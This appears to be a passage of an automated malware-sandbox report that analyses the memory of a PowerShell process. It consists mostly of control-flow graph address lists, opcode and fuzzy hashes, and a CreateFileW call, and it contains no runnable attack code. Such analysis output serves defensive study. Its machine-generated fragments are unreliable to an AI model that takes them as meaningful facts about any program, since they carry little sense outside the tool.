7ffd9b8b6dd8 155->156 157 7ffd9b8bbe72-7ffd9b8bbe78 155->157 187 7ffd9b8bbe5e-7ffd9b8bbe66 156->187 188 7ffd9b8bbe71 156->188 159 7ffd9b8bbe7c-7ffd9b8bbe89 157->159 160 7ffd9b8bbe7a 157->160 162 7ffd9b8bbe8b 159->162 163 7ffd9b8bbe8d-7ffd9b8bbe96 159->163 160->159 162->163 164 7ffd9b8bbe98 163->164 165 7ffd9b8bbe9a-7ffd9b8bbe9e 163->165 164->165 167 7ffd9b8bbf58-7ffd9b8bbf5e 165->167 168 7ffd9b8bbea4-7ffd9b8bbf4c call 7ffd9b8b6d88 165->168 171 7ffd9b8bbf60 167->171 172 7ffd9b8bbf62-7ffd9b8bbf76 167->172 216 7ffd9b8bbf50-7ffd9b8bbf51 168->216 217 7ffd9b8bbf4e 168->217 171->172 174 7ffd9b8bbf78 172->174 175 7ffd9b8bbf7a-7ffd9b8bbf98 172->175 174->175 185 7ffd9b8bc089-7ffd9b8bc097 call 7ffd9b8bc12e 175->185 186 7ffd9b8bbf9e-7ffd9b8bbfa4 175->186 199 7ffd9b8bc0aa-7ffd9b8bc0b5 185->199 200 7ffd9b8bc099-7ffd9b8bc09f 185->200 191 7ffd9b8bbfa8-7ffd9b8bbfac 186->191 192 7ffd9b8bbfa6 186->192 193 7ffd9b8bbe68 187->193 194 7ffd9b8bbe6a-7ffd9b8bbe6b 187->194 188->157 196 7ffd9b8bbfb2-7ffd9b8bbfbd 191->196 197 7ffd9b8bc041-7ffd9b8bc047 191->197 192->191 193->194 194->188 202 7ffd9b8bc04b-7ffd9b8bc05f 197->202 203 7ffd9b8bc049 197->203 211 7ffd9b8bc0b7-7ffd9b8bc0fb call 7ffd9b8b2ed8 199->211 212 7ffd9b8bc11b-7ffd9b8bc12d 199->212 205 7ffd9b8bc0a3-7ffd9b8bc0a7 200->205 206 7ffd9b8bc0a1 200->206 208 7ffd9b8bc063-7ffd9b8bc067 202->208 209 7ffd9b8bc061 202->209 203->202 205->199 206->205 215 7ffd9b8bc06c-7ffd9b8bc06f 208->215 209->208 211->212 219 7ffd9b8bc082-7ffd9b8bc086 215->219 220 7ffd9b8bc071-7ffd9b8bc081 215->220 216->167 217->216 219->185 220->219
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000004.00000002.1886251879.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_4_2_7ffd9b8b0000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: d$hK_H
                                                                      • API String ID: 0-3516879071
                                                                      • Opcode ID: 6feeec63c603e65eafba01869dad4de22ba26a2fd9b99ae4c93dcf7a3230848c
                                                                      • Instruction ID: 3c962bbc2a29fffbbf724db8e3457cd3624087871c88e3f6d6519f2a933214e5
                                                                      • Opcode Fuzzy Hash: 6feeec63c603e65eafba01869dad4de22ba26a2fd9b99ae4c93dcf7a3230848c
                                                                      • Instruction Fuzzy Hash: 90824731B0EA4E4FE76DDB2888616B5B7E1EF59310B1541BED04EC71E6DE24BC428B81

                                                                      Control-flow Graph

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000004.00000002.1886251879.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_4_2_7ffd9b8b0000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: oK_^$[pK
                                                                      • API String ID: 0-738319859
                                                                      • Opcode ID: 86cc26134bbd2d145030e4eec4c72f82de87b0e6d0cc4adefa650f1dd9ccdbe8
                                                                      • Instruction ID: 14e0d76aef60a1679cbdf66cf4c6b20d06f26c33cbd6ee36ef3d7a2f8a17d8a4
                                                                      • Opcode Fuzzy Hash: 86cc26134bbd2d145030e4eec4c72f82de87b0e6d0cc4adefa650f1dd9ccdbe8
                                                                      • Instruction Fuzzy Hash: DB713667B0D93A5AE31976BDBC694E97740EFC427E70403B7D29DCA093A908718B47E0

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 384 7ffd9b8bba99-7ffd9b8bbb25 391 7ffd9b8bbb27 384->391 392 7ffd9b8bbb29-7ffd9b8bbb32 384->392 391->392 393 7ffd9b8bbb3b-7ffd9b8bbb3f 392->393 394 7ffd9b8bbb34-7ffd9b8bbb39 392->394 395 7ffd9b8bbb42-7ffd9b8bbba5 393->395 394->395 400 7ffd9b8bbba7 395->400 401 7ffd9b8bbba9-7ffd9b8bbc1f call 7ffd9b8b4620 395->401 400->401 410 7ffd9b8bbc23-7ffd9b8bbc2c 401->410 411 7ffd9b8bbc21 401->411 412 7ffd9b8bbc35-7ffd9b8bbc39 410->412 413 7ffd9b8bbc2e-7ffd9b8bbc33 410->413 411->410 414 7ffd9b8bbc3c-7ffd9b8bbc7a 412->414 413->414 418 7ffd9b8bbc7c 414->418 419 7ffd9b8bbc7e-7ffd9b8bbc87 414->419 418->419 420 7ffd9b8bbc89-7ffd9b8bbc8e 419->420 421 7ffd9b8bbc90-7ffd9b8bbc94 419->421 422 7ffd9b8bbc97-7ffd9b8bbd03 420->422 421->422 428 7ffd9b8bbd07-7ffd9b8bbd3d 422->428 429 7ffd9b8bbd05 422->429 433 7ffd9b8bbd3f 428->433 434 7ffd9b8bbd41-7ffd9b8bbd58 428->434 429->428 433->434 436 7ffd9b8bbd5c-7ffd9b8bbd65 434->436 437 7ffd9b8bbd5a 434->437 438 7ffd9b8bbd67 436->438 439 7ffd9b8bbd69-7ffd9b8bbd7d 436->439 437->436 438->439 441 7ffd9b8bbd7f 439->441 442 7ffd9b8bbd81-7ffd9b8bbdb6 439->442 441->442 446 7ffd9b8bbdb8-7ffd9b8bbdba 442->446 447 7ffd9b8bbdbc-7ffd9b8bbdd5 442->447 448 7ffd9b8bbdd7-7ffd9b8bbddd 446->448 447->448 450 7ffd9b8bbddf 448->450 451 7ffd9b8bbde1-7ffd9b8bbde5 448->451 450->451 452 7ffd9b8bbdeb-7ffd9b8bbe5c call 7ffd9b8b6dd8 451->452 453 7ffd9b8bbe72-7ffd9b8bbe78 451->453 483 7ffd9b8bbe5e-7ffd9b8bbe66 452->483 484 7ffd9b8bbe71 452->484 455 7ffd9b8bbe7c-7ffd9b8bbe89 453->455 456 7ffd9b8bbe7a 453->456 458 7ffd9b8bbe8b 455->458 459 7ffd9b8bbe8d-7ffd9b8bbe96 455->459 456->455 458->459 460 7ffd9b8bbe98 459->460 461 7ffd9b8bbe9a-7ffd9b8bbe9e 459->461 460->461 463 7ffd9b8bbf58-7ffd9b8bbf5e 461->463 464 7ffd9b8bbea4-7ffd9b8bbf4c call 7ffd9b8b6d88 461->464 467 7ffd9b8bbf60 463->467 468 7ffd9b8bbf62-7ffd9b8bbf76 463->468 512 7ffd9b8bbf50-7ffd9b8bbf51 464->512 513 7ffd9b8bbf4e 464->513 467->468 470 7ffd9b8bbf78 468->470 471 7ffd9b8bbf7a-7ffd9b8bbf98 468->471 470->471 481 7ffd9b8bc089-7ffd9b8bc097 call 7ffd9b8bc12e 471->481 482 7ffd9b8bbf9e-7ffd9b8bbfa4 471->482 495 7ffd9b8bc0aa-7ffd9b8bc0b5 481->495 496 7ffd9b8bc099-7ffd9b8bc09f 481->496 487 7ffd9b8bbfa8-7ffd9b8bbfac 482->487 488 7ffd9b8bbfa6 482->488 489 7ffd9b8bbe68 483->489 490 7ffd9b8bbe6a-7ffd9b8bbe6b 483->490 484->453 492 7ffd9b8bbfb2-7ffd9b8bbfbd 487->492 493 7ffd9b8bc041-7ffd9b8bc047 487->493 488->487 489->490 490->484 498 7ffd9b8bc04b-7ffd9b8bc05f 493->498 499 7ffd9b8bc049 493->499 507 7ffd9b8bc0b7-7ffd9b8bc0fb call 7ffd9b8b2ed8 495->507 508 7ffd9b8bc11b-7ffd9b8bc12d 495->508 501 7ffd9b8bc0a3-7ffd9b8bc0a7 496->501 502 7ffd9b8bc0a1 496->502 504 7ffd9b8bc063-7ffd9b8bc067 498->504 505 7ffd9b8bc061 498->505 499->498 501->495 502->501 511 7ffd9b8bc06c-7ffd9b8bc06f 504->511 505->504 507->508 515 7ffd9b8bc082-7ffd9b8bc086 511->515 516 7ffd9b8bc071-7ffd9b8bc081 511->516 512->463 513->512 515->481 516->515
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000004.00000002.1886251879.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_4_2_7ffd9b8b0000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: hK_H
                                                                      • API String ID: 0-3862817512
                                                                      • Opcode ID: 6da022cf288d815f678dab9ddef967c1b2839cd59fa98b0f1a795aee57f97b5d
                                                                      • Instruction ID: f45289687b42cd5b97703cdd2a6fc523fa9c7e72eb35114748d537653233dedb
                                                                      • Opcode Fuzzy Hash: 6da022cf288d815f678dab9ddef967c1b2839cd59fa98b0f1a795aee57f97b5d
                                                                      • Instruction Fuzzy Hash: E6F1F971B0E98E4FEBADDB38446567977D2EFA9340F0541BAD00DC72E6DD24AD028781

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 559 7ffd9b984895-7ffd9b984897 560 7ffd9b9848dc-7ffd9b984938 559->560 561 7ffd9b984899-7ffd9b9848b8 559->561 562 7ffd9b984944-7ffd9b984980 560->562 563 7ffd9b98493a-7ffd9b98493f 560->563 566 7ffd9b984982-7ffd9b984984 562->566 567 7ffd9b9849ad-7ffd9b9849cf 562->567 563->562 568 7ffd9b984988-7ffd9b9849ab 566->568 569 7ffd9b984986 566->569 570 7ffd9b984af4-7ffd9b984b52 567->570 571 7ffd9b9849d5-7ffd9b9849df 567->571 568->567 569->568 596 7ffd9b984b54-7ffd9b984b6b 570->596 597 7ffd9b984b7d-7ffd9b984ba7 570->597 573 7ffd9b9849e1-7ffd9b9849ef 571->573 574 7ffd9b9849f9-7ffd9b9849ff 571->574 573->574 582 7ffd9b9849f1-7ffd9b9849f7 573->582 578 7ffd9b984a89-7ffd9b984a93 574->578 579 7ffd9b984a05-7ffd9b984a08 574->579 580 7ffd9b984aa6-7ffd9b984af1 578->580 581 7ffd9b984a95-7ffd9b984aa5 578->581 584 7ffd9b984a1f-7ffd9b984a23 579->584 585 7ffd9b984a0a-7ffd9b984a13 579->585 580->570 582->574 584->578 591 7ffd9b984a25-7ffd9b984a28 584->591 585->584 591->578 594 7ffd9b984a2a-7ffd9b984a2d 591->594 594->578 598 7ffd9b984a2f-7ffd9b984a35 594->598 607 7ffd9b984b6f-7ffd9b984b7b 596->607 608 7ffd9b984b6d 596->608 614 7ffd9b984bb0-7ffd9b984bbf 597->614 615 7ffd9b984ba9 597->615 600 7ffd9b984a54-7ffd9b984a6c 598->600 601 7ffd9b984a37-7ffd9b984a52 598->601 610 7ffd9b984a74-7ffd9b984a79 600->610 611 7ffd9b984a6e-7ffd9b984a72 600->611 601->600 607->597 608->607 613 7ffd9b984a7a-7ffd9b984a88 610->613 611->613 617 7ffd9b984bc1 614->617 618 7ffd9b984bc8-7ffd9b984c10 614->618 615->614 617->618 620 7ffd9b984c12-7ffd9b984c14 618->620 621 7ffd9b984c3d-7ffd9b984c54 618->621 622 7ffd9b984c18-7ffd9b984c3b 620->622 623 7ffd9b984c16 620->623 624 7ffd9b984e43-7ffd9b984e9d 621->624 625 7ffd9b984c5a-7ffd9b984c64 621->625 622->621 623->622 651 7ffd9b984e9f-7ffd9b984eb6 624->651 652 7ffd9b984ec8-7ffd9b984ef1 624->652 627 7ffd9b984c7d-7ffd9b984c82 625->627 628 7ffd9b984c66-7ffd9b984c73 625->628 629 7ffd9b984de4-7ffd9b984dee 627->629 630 7ffd9b984c88-7ffd9b984c8b 627->630 628->627 637 7ffd9b984c75-7ffd9b984c7b 628->637 638 7ffd9b984df0-7ffd9b984dfc 629->638 639 7ffd9b984dfd-7ffd9b984e40 629->639 634 7ffd9b984ca2-7ffd9b984ca6 630->634 635 7ffd9b984c8d-7ffd9b984c96 630->635 634->629 644 7ffd9b984cac-7ffd9b984ce3 634->644 635->634 637->627 639->624 666 7ffd9b984d07 644->666 667 7ffd9b984ce5-7ffd9b984d05 644->667 659 7ffd9b984eba-7ffd9b984ec6 651->659 660 7ffd9b984eb8 651->660 663 7ffd9b984ef4-7ffd9b984f05 652->663 664 7ffd9b984ef3 652->664 659->652 660->659 668 7ffd9b984f08-7ffd9b984f46 663->668 669 7ffd9b984f07 663->669 664->663 670 7ffd9b984d09-7ffd9b984d0b 666->670 667->670 671 7ffd9b984f4d-7ffd9b984f54 668->671 672 7ffd9b984f48 call 7ffd9b984f9b 668->672 669->668 670->629 673 7ffd9b984d11-7ffd9b984d14 670->673 674 7ffd9b984f58-7ffd9b984f80 671->674 675 7ffd9b984f56 671->675 672->671 677 7ffd9b984d2b 673->677 678 7ffd9b984d16-7ffd9b984d29 673->678 685 7ffd9b984fc4-7ffd9b984fce 674->685 686 7ffd9b984f82-7ffd9b984f99 674->686 675->674 682 7ffd9b984d2d-7ffd9b984d2f 677->682 678->682 682->629 684 7ffd9b984d35-7ffd9b984d6f 682->684 699 7ffd9b984d71-7ffd9b984d7e 684->699 700 7ffd9b984d88-7ffd9b984d8e 684->700 687 7ffd9b984fd0-7ffd9b984fd9 685->687 688 7ffd9b984fda-7ffd9b985017 685->688 699->700 705 7ffd9b984d80-7ffd9b984d86 699->705 701 7ffd9b984d90-7ffd9b984da8 700->701 702 7ffd9b984daa-7ffd9b984dad 700->702 701->702 706 7ffd9b984db4-7ffd9b984dbd 702->706 705->700 709 7ffd9b984dbf-7ffd9b984dd4 706->709 710 7ffd9b984dd6-7ffd9b984de3 706->710 709->710
                                                                      Memory Dump Source
                                                                      • Source File: 00000004.00000002.1887487025.00007FFD9B980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B980000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_4_2_7ffd9b980000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 1b4f654e92dda9f73646fc64e61339432278c7f28826cb24c026f521b65bb7a0
                                                                      • Instruction ID: 53ed6c04485c5313134d1c4917cee45d54b0479bf5e8ba00536c74ed5d339c52
                                                                      • Opcode Fuzzy Hash: 1b4f654e92dda9f73646fc64e61339432278c7f28826cb24c026f521b65bb7a0
                                                                      • Instruction Fuzzy Hash: 12423822B1FBC91FE766976858756B47FE1DF52220B0A01FFD089CB1E3D928AD068351

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 520 7ffd9b8bc6f9-7ffd9b8bc72f 522 7ffd9b8bc733-7ffd9b8bc750 call 7ffd9b8b45d0 520->522 523 7ffd9b8bc731 520->523 526 7ffd9b8bc752-7ffd9b8bc75b 522->526 527 7ffd9b8bc781-7ffd9b8bc7ad 522->527 523->522 526->527 533 7ffd9b8bc7b2-7ffd9b8bc7b5 527->533 534 7ffd9b8bc7b7-7ffd9b8bc7d5 533->534 535 7ffd9b8bc812-7ffd9b8bc873 533->535 534->533 539 7ffd9b8bc7d7-7ffd9b8bc80f 534->539 542 7ffd9b8bc875-7ffd9b8bc87a 535->542 543 7ffd9b8bc87d-7ffd9b8bc8dc CreateFileW 535->543 539->535 542->543 544 7ffd9b8bc8de 543->544 545 7ffd9b8bc8e4-7ffd9b8bc90c 543->545 544->545
                                                                      Memory Dump Source
                                                                      • Source File: 00000004.00000002.1886251879.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_4_2_7ffd9b8b0000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 7ba455e23ad2089b46fbf0c1ed2cfd733145878707064b27af1e70d50d91515d
                                                                      • Instruction ID: 70d2aa9e7b4f0d1d42bcddfd92528bc22c590c86b874c5c9bf116f78d941abac
                                                                      • Opcode Fuzzy Hash: 7ba455e23ad2089b46fbf0c1ed2cfd733145878707064b27af1e70d50d91515d
                                                                      • Instruction Fuzzy Hash: EB61F731A0DA5C4FD768DB6C98696B97BE1EF59310F05427FE04DD32A2DF24A9028B81

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 549 7ffd9b8bc809-7ffd9b8bc873 554 7ffd9b8bc875-7ffd9b8bc87a 549->554 555 7ffd9b8bc87d-7ffd9b8bc8dc CreateFileW 549->555 554->555 556 7ffd9b8bc8de 555->556 557 7ffd9b8bc8e4-7ffd9b8bc90c 555->557 556->557
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000004.00000002.1886251879.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_4_2_7ffd9b8b0000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID: CreateFile
                                                                      • String ID:
                                                                      • API String ID: 823142352-0
                                                                      • Opcode ID: 71d00ca1516a5994e2fb8ec2bd3de63e1d4e1390a8688244960ca82101f07aec
                                                                      • Instruction ID: 0a19e741fe7321012bc09039949a87bb5eb69f9a41a92a18cab269888b201298
                                                                      • Opcode Fuzzy Hash: 71d00ca1516a5994e2fb8ec2bd3de63e1d4e1390a8688244960ca82101f07aec
                                                                      • Instruction Fuzzy Hash: 1F31B13191CA1C9FDB58EF5CD849AE97BE0FB69321F04422FE049D3251DB70A8028BC1

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 713 7ffd9b98055d-7ffd9b980567 714 7ffd9b98056e-7ffd9b98057f 713->714 715 7ffd9b980569 713->715 717 7ffd9b980581 714->717 718 7ffd9b980586-7ffd9b980597 714->718 715->714 716 7ffd9b98056b 715->716 716->714 717->718 719 7ffd9b980583 717->719 720 7ffd9b98059e-7ffd9b9805af 718->720 721 7ffd9b980599 718->721 719->718 722 7ffd9b9805b1 720->722 723 7ffd9b9805b6-7ffd9b9805c7 720->723 721->720 724 7ffd9b98059b 721->724 722->723 725 7ffd9b9805b3 722->725 726 7ffd9b9805ce-7ffd9b980638 723->726 727 7ffd9b9805c9 723->727 724->720 725->723 730 7ffd9b98063a-7ffd9b98063c 726->730 731 7ffd9b980665-7ffd9b98068f 726->731 727->726 728 7ffd9b9805cb 727->728 728->726 732 7ffd9b980640-7ffd9b980664 730->732 733 7ffd9b98063e 730->733 734 7ffd9b9808a6-7ffd9b980904 731->734 735 7ffd9b980695-7ffd9b98069f 731->735 732->731 733->732 755 7ffd9b98092f-7ffd9b98093b 734->755 756 7ffd9b980906-7ffd9b98091d 734->756 737 7ffd9b9806a1-7ffd9b9806b9 735->737 738 7ffd9b9806bb-7ffd9b9806c8 735->738 737->738 746 7ffd9b9806ce-7ffd9b9806d1 738->746 747 7ffd9b98083b-7ffd9b980845 738->747 746->747 749 7ffd9b9806d7-7ffd9b9806df 746->749 750 7ffd9b980858-7ffd9b9808a3 747->750 751 7ffd9b980847-7ffd9b980857 747->751 749->734 753 7ffd9b9806e5-7ffd9b9806ef 749->753 750->734 757 7ffd9b9806f1-7ffd9b9806ff 753->757 758 7ffd9b980709-7ffd9b98070f 753->758 763 7ffd9b980946-7ffd9b980957 755->763 773 7ffd9b980921-7ffd9b98092d 756->773 774 7ffd9b98091f 756->774 757->758 764 7ffd9b980701-7ffd9b980707 757->764 758->747 762 7ffd9b980715-7ffd9b980718 758->762 765 7ffd9b980761 762->765 766 7ffd9b98071a-7ffd9b98072d 762->766 777 7ffd9b980960-7ffd9b98096f 763->777 778 7ffd9b980959 763->778 764->758 767 7ffd9b980763-7ffd9b980765 765->767 766->734 776 7ffd9b980733-7ffd9b98073d 766->776 767->747 772 7ffd9b98076b-7ffd9b98076e 767->772 779 7ffd9b980770-7ffd9b980779 772->779 780 7ffd9b980785-7ffd9b980789 772->780 773->755 774->773 781 7ffd9b98073f-7ffd9b980754 776->781 782 7ffd9b980756-7ffd9b98075f 776->782 783 7ffd9b980971 777->783 784 7ffd9b980978-7ffd9b980994 777->784 778->777 779->780 780->747 791 7ffd9b98078f-7ffd9b980795 780->791 781->782 782->767 783->784 789 7ffd9b980998-7ffd9b9809c4 784->789 790 7ffd9b980996 784->790 792 7ffd9b9809c8-7ffd9b9809f5 789->792 793 7ffd9b9809c6 789->793 790->789 794 7ffd9b9807b1-7ffd9b9807b7 791->794 795 7ffd9b980797-7ffd9b9807a4 791->795 800 7ffd9b980a68-7ffd9b980a72 792->800 801 7ffd9b9809f7-7ffd9b980a07 792->801 793->792 797 7ffd9b9807d3-7ffd9b980810 794->797 798 7ffd9b9807b9-7ffd9b9807c6 794->798 795->794 802 7ffd9b9807a6-7ffd9b9807af 795->802 825 7ffd9b980812-7ffd9b980827 797->825 826 7ffd9b980829-7ffd9b98083a 797->826 798->797 808 7ffd9b9807c8-7ffd9b9807d1 798->808 805 7ffd9b980a74-7ffd9b980a79 800->805 806 7ffd9b980a7c-7ffd9b980ac1 800->806 811 7ffd9b980a14-7ffd9b980a2a 801->811 812 7ffd9b980a09-7ffd9b980a12 801->812 802->794 810 7ffd9b980a7a-7ffd9b980a7b 805->810 808->797 811->810 821 7ffd9b980a2c-7ffd9b980a65 811->821 812->811 825->826
                                                                      Memory Dump Source
                                                                      • Source File: 00000004.00000002.1887487025.00007FFD9B980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B980000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_4_2_7ffd9b980000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: dcfe802d69aecaf5b1de9cf322f40da8cfad50d780ff294d6dcac3d29d5ea2fb
                                                                      • Instruction ID: f24dd19bf3bc291b95654f8a356ca2baea912447168de96ec89a043f4d6042fd
                                                                      • Opcode Fuzzy Hash: dcfe802d69aecaf5b1de9cf322f40da8cfad50d780ff294d6dcac3d29d5ea2fb
                                                                      • Instruction Fuzzy Hash: 2D123661A1FBC92FE766976858355747BE1EF52610B0A01FBD08CC70F3DA29AD06C392

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 832 7ffd9b98501d-7ffd9b985060 833 7ffd9b985062-7ffd9b985064 832->833 834 7ffd9b98508d-7ffd9b9850a7 832->834 835 7ffd9b985068-7ffd9b98508b 833->835 836 7ffd9b985066 833->836 837 7ffd9b9850ad-7ffd9b9850b7 834->837 838 7ffd9b9851ba-7ffd9b9851f7 834->838 835->834 836->835 840 7ffd9b9850d3-7ffd9b9850e0 837->840 841 7ffd9b9850b9-7ffd9b9850d1 837->841 851 7ffd9b985221-7ffd9b98522d 838->851 852 7ffd9b9851f9-7ffd9b985214 838->852 849 7ffd9b9850e2-7ffd9b9850e5 840->849 850 7ffd9b98515b-7ffd9b985165 840->850 841->840 849->850 853 7ffd9b9850e7-7ffd9b9850ef 849->853 854 7ffd9b985174-7ffd9b9851b7 850->854 855 7ffd9b985167-7ffd9b985173 850->855 866 7ffd9b985231-7ffd9b98523d 851->866 867 7ffd9b98522f 851->867 868 7ffd9b98523f-7ffd9b985269 852->868 869 7ffd9b985216-7ffd9b985220 852->869 853->838 856 7ffd9b9850f5-7ffd9b9850ff 853->856 854->838 859 7ffd9b985101-7ffd9b985116 856->859 860 7ffd9b985118-7ffd9b98511c 856->860 859->860 860->850 865 7ffd9b98511e-7ffd9b985121 860->865 865->850 871 7ffd9b985123-7ffd9b985124 865->871 866->868 867->866 880 7ffd9b98526c-7ffd9b98527d 868->880 881 7ffd9b98526b 868->881 869->851 875 7ffd9b98512b-7ffd9b985134 871->875 876 7ffd9b98514d-7ffd9b98515a 875->876 877 7ffd9b985136-7ffd9b985143 875->877 877->876 882 7ffd9b985145-7ffd9b98514b 877->882 883 7ffd9b985280-7ffd9b9852c8 880->883 884 7ffd9b98527f 880->884 881->880 882->876 886 7ffd9b9852ca-7ffd9b9852cc 883->886 887 7ffd9b9852f5-7ffd9b98531a 883->887 884->883 889 7ffd9b9852d0-7ffd9b9852f4 886->889 890 7ffd9b9852ce 886->890 891 7ffd9b985462-7ffd9b98552b 887->891 892 7ffd9b985320-7ffd9b98532a 887->892 889->887 890->889 894 7ffd9b985343-7ffd9b985348 892->894 895 7ffd9b98532c-7ffd9b985341 892->895 899 7ffd9b985402-7ffd9b98540c 894->899 900 7ffd9b98534e-7ffd9b985351 894->900 895->894 901 7ffd9b98540e-7ffd9b98541c 899->901 902 7ffd9b98541d-7ffd9b98545f 899->902 903 7ffd9b985353-7ffd9b985362 900->903 904 7ffd9b985396 900->904 902->891 903->891 911 7ffd9b985368-7ffd9b985372 903->911 906 7ffd9b985398-7ffd9b98539a 904->906 906->899 910 7ffd9b98539c-7ffd9b9853a2 906->910 913 7ffd9b9853a4-7ffd9b9853bf 910->913 914 7ffd9b9853c1-7ffd9b9853d4 910->914 916 7ffd9b985374-7ffd9b985384 911->916 917 7ffd9b98538b-7ffd9b985394 911->917 913->914 923 7ffd9b9853ed-7ffd9b985401 914->923 924 7ffd9b9853d6-7ffd9b9853e3 914->924 916->917 917->906 924->923 929 7ffd9b9853e5-7ffd9b9853eb 924->929 929->923
                                                                      Memory Dump Source
                                                                      • Source File: 00000004.00000002.1887487025.00007FFD9B980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B980000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_4_2_7ffd9b980000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 8a83ff186559d885f55ce8f0b990d6c8f5240b2d0cb546daee61ca15e3d4ca6a
                                                                      • Instruction ID: fa712ccc8d6de71ddacbf172817f080b36ba0fbf71d88e950168932248a7d6ab
                                                                      • Opcode Fuzzy Hash: 8a83ff186559d885f55ce8f0b990d6c8f5240b2d0cb546daee61ca15e3d4ca6a
                                                                      • Instruction Fuzzy Hash: 60024922B1EE8D1FE7A69B6858655B53BE1EF56320B0901FBD04DCB0A3ED24ED09C341

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 969 7ffd9b984c9a-7ffd9b984ca6 971 7ffd9b984de4-7ffd9b984dee 969->971 972 7ffd9b984cac-7ffd9b984ce3 969->972 974 7ffd9b984df0-7ffd9b984dfc 971->974 975 7ffd9b984dfd-7ffd9b984e9d 971->975 984 7ffd9b984d07 972->984 985 7ffd9b984ce5-7ffd9b984d05 972->985 1002 7ffd9b984e9f-7ffd9b984eb6 975->1002 1003 7ffd9b984ec8-7ffd9b984ef1 975->1003 986 7ffd9b984d09-7ffd9b984d0b 984->986 985->986 986->971 987 7ffd9b984d11-7ffd9b984d14 986->987 990 7ffd9b984d2b 987->990 991 7ffd9b984d16-7ffd9b984d29 987->991 995 7ffd9b984d2d-7ffd9b984d2f 990->995 991->995 995->971 997 7ffd9b984d35-7ffd9b984d6f 995->997 1016 7ffd9b984d71-7ffd9b984d7e 997->1016 1017 7ffd9b984d88-7ffd9b984d8e 997->1017 1009 7ffd9b984eba-7ffd9b984ec6 1002->1009 1010 7ffd9b984eb8 1002->1010 1013 7ffd9b984ef4-7ffd9b984f05 1003->1013 1014 7ffd9b984ef3 1003->1014 1009->1003 1010->1009 1018 7ffd9b984f08-7ffd9b984f46 1013->1018 1019 7ffd9b984f07 1013->1019 1014->1013 1016->1017 1028 7ffd9b984d80-7ffd9b984d86 1016->1028 1020 7ffd9b984d90-7ffd9b984da8 1017->1020 1021 7ffd9b984daa-7ffd9b984dad 1017->1021 1023 7ffd9b984f4d-7ffd9b984f54 1018->1023 1024 7ffd9b984f48 call 7ffd9b984f9b 1018->1024 1019->1018 1020->1021 1030 7ffd9b984db4-7ffd9b984dbd 1021->1030 1026 7ffd9b984f58-7ffd9b984f80 1023->1026 1027 7ffd9b984f56 1023->1027 1024->1023 1036 7ffd9b984fc4-7ffd9b984fce 1026->1036 1037 7ffd9b984f82-7ffd9b984f99 1026->1037 1027->1026 1028->1017 1034 7ffd9b984dbf-7ffd9b984dd4 1030->1034 1035 7ffd9b984dd6-7ffd9b984de3 1030->1035 1034->1035 1039 7ffd9b984fd0-7ffd9b984fd9 1036->1039 1040 7ffd9b984fda-7ffd9b985017 1036->1040
                                                                      Memory Dump Source
                                                                      • Source File: 00000004.00000002.1887487025.00007FFD9B980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B980000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_4_2_7ffd9b980000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: bea6bac2675710261638541d2319a21d4e7ac5c8db88c0852c3791008b2135fa
                                                                      • Instruction ID: f4385f25848be57e4c50547448b8190e9d1114919e2e390056aba884f349bcf5
                                                                      • Opcode Fuzzy Hash: bea6bac2675710261638541d2319a21d4e7ac5c8db88c0852c3791008b2135fa
